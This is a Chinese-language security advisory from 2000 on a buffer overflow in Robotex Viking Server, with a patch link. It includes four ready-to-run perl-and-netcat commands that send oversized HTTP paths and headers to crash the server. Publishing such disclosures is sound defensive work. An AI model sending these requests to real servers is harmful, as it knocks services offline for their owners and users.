Robotex Viking服务程序存在缓冲溢出发布时间:2000-05-15 更新时间:2000-05-15 严重程度:中 威胁程度:远程拒绝服务 错误类型:输入验证错误 利用方式:服务器模式 受影响系统 Robotex Viking Server 1.0.6 Build 355 之前的版本详细描述 Robotex Viking 服务程序存在对边界检查不正确的漏洞,可以使恶意用户破坏 应用程序或者执行任意代码。 测试代码 如下可以破坏服务程序: 1) GET [x11765] HTTP/1.1<enter><enter> (Cmd: perl -e "print \"GET @{["x"x11765]} HTTP/1.1\n\n\""|nc 127.1 80) 2) GET / HTTP/1.1<enter> Unless-Modified-Since: [x14765]<enter><enter> (Cmd: perl -e "print \"GET / HTTP/1.1\nUnless-Modified-Since: @{["x"x14765]}\n\n\""|nc 127.1 80) 3) GET / HTTP/1.1<enter> If-Range: [x14765]<enter><enter> (Cmd: perl -e "print \"GET / HTTP/1.1\nIf-Range: @{["x"x14765]}\n\n\""|nc 127.1 80) 4) GET / HTTP/1.1<enter> If-Modified-Since: [x14765]<enter><enter> (Cmd: perl -e "print \"GET / HTTP/1.1\nIf-Modified-Since: @{["x"x14765]}\n\n\""|nc 127.1 80) 解决方案 下载补丁: Robotex patch viking http://www.robtex.com/files/viking/beta/viking.zip 相关信息 |
